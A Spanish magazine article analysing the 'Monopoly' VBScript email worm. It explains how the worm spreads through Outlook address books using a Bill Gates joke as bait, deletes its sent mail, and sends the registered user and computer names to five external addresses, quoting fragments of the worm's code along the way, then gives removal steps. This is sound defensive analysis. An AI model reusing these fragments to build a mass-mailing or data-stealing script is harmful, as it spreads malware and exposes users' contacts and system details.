ARTÍCULOS / EN VANGUARDIA / VIRUSMANÍA / EL VIRUS MONOPOLY

Monopoly, un poco más de cerca

Texto: Javier Guerrero Díaz

"Monopoly" es un gusano programado en lenguaje VBScript, por tanto, su código es susceptible de ser ejecutado en cualquier máquina con Windows 9x y el intérprete de scripts VB instalado. Cuando el fichero MONOPOLY.VBS adjunto es ejecutado, el gusano crea el fichero JPG que contiene la imagen y también crea los ficheros MONOPOLY.WSH y MONOPOLY.VBE si la versión de VBScript es igual o superior a cinco, donde el archivo WSH se encarga de ejecutar el resto del código maligno almacenado en el fichero VBE. Conviene aclarar que, por supuesto, todo el código mostrado aquí carece de utilidad y su funcionamiento tal cual es nulo, dado que se encuentra fuera del contexto del virus. Por ello, no puede ser empleado para fines poco claros. El gusano comprueba si ya se instaló en la máquina actual buscando en el Registry la clave "OUTLOOK.Monopoly" mediante la siguiente línea:

A2=A1.REGREAD("HKEY_LOCAL_MACHINE\Software\OUTLOOK.Monopoly\"

Para acceder a la libreta de direcciones de "Outlook", utiliza el siguiente código para instanciar un objeto de "Outlook":
SET A3=CreateObject("Outlook.Application")

Y mediante un bucle, recorre la libreta de direcciones buscando correos a los que enviarse. El bucle tiene el siguiente aspecto:

For Each A5 in A4.AddressLists
Set A6=A3.CreateItem(0)
For A7=1 to A5.AddressEntries.Count
A6.BCC=A8.Address

Un chiste como tapadera

El gusano utiliza el chiste sobre Gates como tapadera para introducirse en el sistema, creando un correo con los campos Asunto y Cuerpo convenientemente asignados, de esta forma:

A6.Subject="Bill Gates joke"
A6.Body="Bill Gates is guilty of monopoly. Here is the proof. :-)"

De manera astuta, el intruso trata de no dejar huellas, borrando dicho correo tras enviarlo, mediante dos sencillas órdenes:

A6.DeleteAfterSubmit=true
A6.Send

El gusano envía diversa información a cinco direcciones de correo electrónico diferentes, haciendo uso de la siguiente orden para asignarlas al campo "Blind Carbon Copy":

A10.BCC="monopoly@mixmail.com; monpooly@teleboot.com; moonponly@ciudad.com.ar; mloponoy@usanet; yloponom@gnwmail.com"

También podemos apreciar un ejemplo de la forma que tiene el "Monopoly" de extraer información del Registro de Windows, veremos concretamente cómo obtiene el nombre de usuario registrado y el nombre del PC en la Red:

A1.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") A12=A12&A13.ComputerName

¿Cómo eliminarlo?

Al tratarse de un gusano, bastará con localizar, por ejemplo, mediante la opción "Inicio/Buscar" de Windows, los ficheros que componen el gusano, es decir, MONOPOLY.VBS, .WSH y .VBE) y simplemente borrarlos. Y para completar la eliminación, será necesario buscar y borrar, en el Registro, la clave utilizada por el intruso para comprobar su paso por el PC en cuestión. En cualquier caso, aunque éstas son operaciones muy sencillas, si se prefiere jugar sobre seguro, las principales firmas antivirus detectan este gusano, por lo que cualquiera de dichos productos será capaz de afrontar el tema sin mayor problema.